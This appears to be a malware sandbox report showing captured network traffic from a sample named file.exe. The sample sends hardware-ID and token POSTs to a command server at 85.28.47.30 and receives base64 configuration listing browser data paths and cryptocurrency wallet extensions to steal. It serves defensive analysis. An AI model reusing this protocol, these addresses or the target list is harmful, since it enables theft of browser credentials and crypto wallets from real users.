                                                                Jul 5, 2024 04:37:51.961524963 CEST804979077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:52.177917957 CEST804979077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:52.178082943 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:52.279119968 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:52.279340029 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:52.284252882 CEST804979177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:52.284264088 CEST804979077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:52.284337044 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:52.284341097 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:52.284516096 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:52.289247036 CEST804979177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:52.980564117 CEST804979177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:52.980726957 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:52.981236935 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:52.988290071 CEST804979177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:53.199307919 CEST804979177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:53.199398041 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:53.310401917 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:53.310622931 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:53.316412926 CEST804979177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:53.316569090 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:53.316704035 CEST804979277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:53.316786051 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:53.317128897 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:53.323115110 CEST804979277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:54.018511057 CEST804979277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:54.018589973 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:54.019181013 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:54.023940086 CEST804979277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:54.237591982 CEST804979277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:54.237649918 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:54.341419935 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:54.341711998 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:54.346626043 CEST804979277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:54.346637011 CEST804979377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:54.346687078 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:54.346710920 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:54.346827984 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:54.351577997 CEST804979377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:55.057070971 CEST804979377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:55.057143927 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:55.057758093 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:55.062542915 CEST804979377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:55.281194925 CEST804979377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:55.281271935 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:55.389997005 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:55.390278101 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:55.395890951 CEST804979377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:55.395905018 CEST804979477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:55.395951033 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:55.396020889 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:55.396119118 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:55.401292086 CEST804979477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:56.105695009 CEST804979477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:56.105776072 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:56.106391907 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:56.111170053 CEST804979477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:56.478682041 CEST804979477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:56.478744030 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:56.591589928 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:56.591864109 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:56.596715927 CEST804979577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:56.596779108 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:56.596796989 CEST804979477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:56.596839905 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:56.596945047 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:56.601855993 CEST804979577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:57.296521902 CEST804979577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:57.296600103 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:57.297256947 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:57.304585934 CEST804979577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:57.515573025 CEST804979577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:57.515640020 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:57.622765064 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:57.623054028 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:57.628021002 CEST804979577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:57.628106117 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:57.628529072 CEST804979677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:57.628611088 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:57.628777981 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:57.633635044 CEST804979677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:58.359369993 CEST804979677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:58.359431982 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:58.360021114 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:58.367531061 CEST804979677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:58.588716984 CEST804979677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:58.588771105 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:58.700932026 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:58.701236010 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:58.706110954 CEST804979777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:58.706199884 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:58.706305981 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:58.706774950 CEST804979677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:58.706837893 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:58.716654062 CEST804979777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:59.421289921 CEST804979777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:59.422250032 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:59.422738075 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:59.427958965 CEST804979777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:59.647420883 CEST804979777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:59.650158882 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:59.765053034 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:59.765219927 CEST4979880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:59.769988060 CEST804979877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:59.770286083 CEST4979880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:59.770342112 CEST804979777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:59.770379066 CEST4979880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:59.770422935 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:59.775690079 CEST804979877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:38:00.486498117 CEST804979877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:38:00.486685038 CEST4979880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:38:00.487190008 CEST4979880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:38:00.497251987 CEST804979877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:38:00.708609104 CEST804979877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:38:00.708681107 CEST4979880192.168.2.477.91.77.82
                                                                • 85.28.47.30
                                                                • 77.91.77.81
                                                                • 77.91.77.82
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.44973085.28.47.30806436C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:35:57.138370991 CEST409OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----HIIDGCGCBFBAKFHIJDBA
                                                                Host: 85.28.47.30
                                                                Content-Length: 211
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 39 31 37 45 39 36 37 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 2d 2d 0d 0a
                                                                Data Ascii: ------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="hwid"66917E967D213859137049------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="build"Nice------HIIDGCGCBFBAKFHIJDBA--
                                                                Jul 5, 2024 04:35:57.846409082 CEST384INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:35:57 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 156
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 59 7a 41 35 59 57 59 30 4d 7a 4e 6d 4d 47 4d 32 4e 47 51 31 59 6d 59 77 5a 57 4d 79 4d 7a 46 69 4e 57 4e 69 4e 7a 55 7a 4d 54 6b 32 4d 54 4d 30 4d 6a 68 6a 4d 6a 52 6a 4e 54 45 30 4e 32 49 79 59 32 49 35 5a 54 49 31 5a 44 56 6c 59 54 63 77 4d 6a 41 7a 4d 57 56 6a 4d 6d 4a 68 5a 6d 49 32 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d
                                                                Data Ascii: YzA5YWY0MzNmMGM2NGQ1YmYwZWMyMzFiNWNiNzUzMTk2MTM0MjhjMjRjNTE0N2IyY2I5ZTI1ZDVlYTcwMjAzMWVjMmJhZmI2fGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDB8MHwxfDF8MXwxfDF8MXw=
                                                                Jul 5, 2024 04:35:57.847863913 CEST466OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGH
                                                                Host: 85.28.47.30
                                                                Content-Length: 268
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 2d 2d 0d 0a
                                                                Data Ascii: ------DBFHDHJKKJDHJJJJKEGHContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------DBFHDHJKKJDHJJJJKEGHContent-Disposition: form-data; name="message"browsers------DBFHDHJKKJDHJJJJKEGH--
                                                                Jul 5, 2024 04:35:58.030500889 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:35:57 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 1520
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                Jul 5, 2024 04:35:58.030519009 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                Jul 5, 2024 04:35:58.031752110 CEST465OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEB
                                                                Host: 85.28.47.30
                                                                Content-Length: 267
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 43 47 44 42 46 43 42 41 4b 45 43 42 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 43 47 44 42 46 43 42 41 4b 45 43 42 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 43 47 44 42 46 43 42 41 4b 45 43 42 4b 4b 45 42 2d 2d 0d 0a
                                                                Data Ascii: ------KJEHCGDBFCBAKECBKKEBContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------KJEHCGDBFCBAKECBKKEBContent-Disposition: form-data; name="message"plugins------KJEHCGDBFCBAKECBKKEB--
                                                                Jul 5, 2024 04:35:58.217967987 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:35:58 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 5416
                                                                Keep-Alive: timeout=5, max=98
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                Jul 5, 2024 04:35:58.217984915 CEST1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                Jul 5, 2024 04:35:58.218009949 CEST1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                Jul 5, 2024 04:35:58.218023062 CEST672INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                Jul 5, 2024 04:35:58.218040943 CEST1236INData Raw: 64 47 6c 6a 59 58 52 76 63 6e 78 70 62 47 64 6a 62 6d 68 6c 62 48 42 6a 61 47 35 6a 5a 57 56 70 63 47 6c 77 61 57 70 68 62 47 70 72 59 6d 78 69 59 32 39 69 62 48 77 78 66 44 42 38 4d 48 78 43 61 58 52 33 59 58 4a 6b 5a 57 35 38 62 6d 35 6e 59 32
                                                                Data Ascii: dGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfERhc2hsYW5lfGZkamFtYWtwZmJiZGRmamFvb2lrZmNwYXBqb2h
                                                                Jul 5, 2024 04:35:58.218054056 CEST28INData Raw: 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 77 3d
                                                                Data Ascii: cG5rbWRqcG9jZ2toYXwxfDB8MHw=
